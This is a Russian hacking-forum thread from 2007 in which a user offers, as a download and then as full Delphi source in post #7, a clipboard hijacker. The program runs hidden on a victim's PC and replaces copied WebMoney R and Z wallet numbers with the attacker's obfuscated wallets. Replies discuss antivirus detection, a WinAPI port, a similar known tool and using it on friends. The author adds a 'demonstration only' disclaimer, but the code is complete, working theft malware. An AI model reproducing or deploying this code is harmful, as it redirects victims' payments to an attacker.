ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу Wm шалость
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Wm шалость
  #1  
Старый 21.06.2007, 09:29
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию Wm шалость
Написал небольшую программку. Суть такова: висит себе тихонько на компе жертвы, при копировании в буфер обмена номера R или Z кошелька (ИМХО самый распространенный метод ввода кошелей в кипер) заменяет их на заранее заготовленные номерки. В итоге жертва вставляет не скопированный, а Ваш номер кошеля
В программе для демонстрации вшиты кошельки

R123456789101
Z123456789101

(придумал наобум)

скачать

Пароль: antichat.ru

Если понравится, выложу исходники (Писал на Delphi + KOL).

Хочу предупредить, что программа написана в целях демонстрации опасности данного метода обмана пользователя, а не, собственно, обмана
 
Ответить с цитированием

  #2  
Старый 21.06.2007, 09:42
-Time-
Участник форума
Регистрация: 04.03.2007
Сообщений: 143
Провел на форуме:
1386939

Репутация: 69
Отправить сообщение для -Time- с помощью ICQ
По умолчанию
Сорцы скинь..
 
Ответить с цитированием

  #3  
Старый 21.06.2007, 09:53
vii
Новичок
Регистрация: 19.06.2007
Сообщений: 22
Провел на форуме:
34487

Репутация: 4
Отправить сообщение для vii с помощью ICQ
По умолчанию
Цитата:
Joker-jar смотри 4 анивиря палят его!

AhnLab-V3 2007.6.21.1 06.21.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.21.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.20.2007 no virus found
BitDefender 7.2 06.21.2007 no virus found
CAT-QuickHeal 9.00 06.21.2007 no virus found
ClamAV devel-20070416 06.21.2007 no virus found
DrWeb 4.33 06.20.2007 no virus found
eSafe 7.0.15.0 06.20.2007 suspicious Trojan/Worm
eTrust-Vet 30.8.3730 06.20.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.21.2007 no virus found
Fortinet 2.91.0.0 06.21.2007 no virus found
F-Prot 4.3.2.48 06.21.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 no virus found
Ikarus T3.1.1.8 06.21.2007 Trojan.Delf.NEB
Kaspersky 4.0.2.24 06.21.2007 no virus found
McAfee 5057 06.20.2007 no virus found
Microsoft 1.2607 06.21.2007 TrojanDownloader:Win32/Small.OE
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 Suspicious file
Prevx1 V2 06.21.2007 no virus found
Sophos 4.18.0 06.12.2007 no virus found
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.21.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.20.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found
Стоит вопрос ты туда больше не чего не впарил?

Цитата:
Но за идею молодец!(хорошая идея!)
Последний раз редактировалось vii; 21.06.2007 в 09:55..
 
Ответить с цитированием

  #4  
Старый 21.06.2007, 09:56
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
Не впарил. А вот беда паблика в том, что первым делом все попадает на вирустотал => в базы антивиров. Вы что, вообще не доверяете антивиру, который стоит на Вашей машине?
 
Ответить с цитированием

  #5  
Старый 21.06.2007, 09:57
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию
Такое уже было.
ЗЫ. Перенесено в С/С++/Дельфи/Асм
 
Ответить с цитированием

  #6  
Старый 21.06.2007, 10:17
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию
Посчитал, что закрывать все-таки не стоит =)
 
Ответить с цитированием

  #7  
Старый 21.06.2007, 10:26
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
=) Гы, спс! Исходник программы:

Код:
program wmb;

uses
  Windows, KOL;

const
  wmr = '\?<=:;8967?>?'; // hidestring('R123456789101', 14)
  wmz = 'G,/.)(+*%$,-,'; // hidestring('Z123456789101', 29)

type
  Twm = (Unknown, R, Z);

var
  Timer: PTimer;
  Mes: msg;

function hidestring(s: string; code: integer): string;
var
  t: Integer;
begin
  for t:=1 to Length(S) do S[t]:=Chr(Ord(S[t]) xor Code);
    Result:=S;
end;

function getwmtype(s: string): Twm;
var
  c: char;
  e: integer;
  i: int64;
begin
  result := Unknown;
  c := upcase(s[1]);
  if (length(s) <> 13) and (c <> chr($52)) and (c <> chr($5a)) then
    exit;
  if c = chr($52) then
    result := R
  else
    result := Z;
  delete(s,1,1);
  val(s,i,e);
  if e <> 0 then
    result := Unknown;
end;

procedure OnTimer(Sender: PControl);
var
  s: string;
begin
  if getwmtype(Clipboard2Text) = R then
    Text2Clipboard(hidestring(wmr, 14))
  else
    if getwmtype(Clipboard2Text) = Z then
      Text2Clipboard(hidestring(wmz, 29));
end;

begin
  Timer := NewTimer(200);
  Timer.OnTimer := TOnEvent(MakeMethod(nil,@OnTimer));
  Timer.Enabled := true;
   while (GetMessage(Mes, 0, 0, 0)) do
     begin
       TranslateMessage(Mes);
       DispatchMessage(Mes);
     end;
end.
Хоть, как сказал _Great_, такое уже было (я видать в то время под стол ходил), думаю, не все знают о данной фишке. Попасться реально легко (не считая сложностей впаривания), будьте внимательны
 
Ответить с цитированием

  #8  
Старый 21.06.2007, 11:53
NetMan
Участник форума
Регистрация: 09.02.2004
Сообщений: 122
Провел на форуме:
1089794

Репутация: 134
По умолчанию
Joker-jar > можно и на чистый WinAPI переделать (see SetTimer).
 
Ответить с цитированием

  #9  
Старый 21.06.2007, 12:09
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию
я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.
Последний раз редактировалось _Great_; 21.06.2007 в 12:19.. Причина: edit
 
Ответить с цитированием

  #10  
Старый 21.06.2007, 13:41
Fire3d
Познающий
Регистрация: 14.04.2007
Сообщений: 46
Провел на форуме:
842554

Репутация: 13
По умолчанию
Цитата:
Сообщение от slesh  
я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.
А я про что ))) Так что эти трояны так побаловатся.... к примеру на друзьями )))
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Я НАШЁЛ _НЕЧТО_ В Ie!!! БАГ ИЛИ ШАЛОСТЬ? Думаем вмсесте... _kREveDKo_ Soft - Windows 6 15.04.2006 03:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ